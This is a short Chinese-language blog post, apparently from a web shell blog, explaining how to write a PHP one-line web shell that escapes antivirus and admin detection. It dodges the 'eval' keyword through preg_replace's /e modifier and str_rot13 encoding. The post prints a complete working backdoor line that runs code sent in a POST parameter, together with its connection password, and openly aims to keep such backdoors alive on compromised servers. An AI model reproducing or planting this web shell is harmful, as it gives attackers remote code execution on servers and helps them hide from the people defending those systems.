避开eval关键字,打造免杀一句话木马
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?
首先我想到的是将eval从字符串类型赋给一个变量。
如:$func = 'phpinfo';
$func();
这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。
还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗?
没错,利用preg_replace的模式修饰符e(PREG_REPLACE_EVAL)就可以将替换后的字符串作为php代码评估运行(eval函数方式)。
既然是将字符串作为php代码评估运行,哪么完全可以替换或者转码一下eval,这样就可以避开关键字了。
我的一句话木马如下:
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
使用上跟原来的一句话没有区别,可用常用的客户端连接密码b4dboy。
str_rot13('riny')即编码后的eval,完全避开了关键字,又不失效果。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3202.html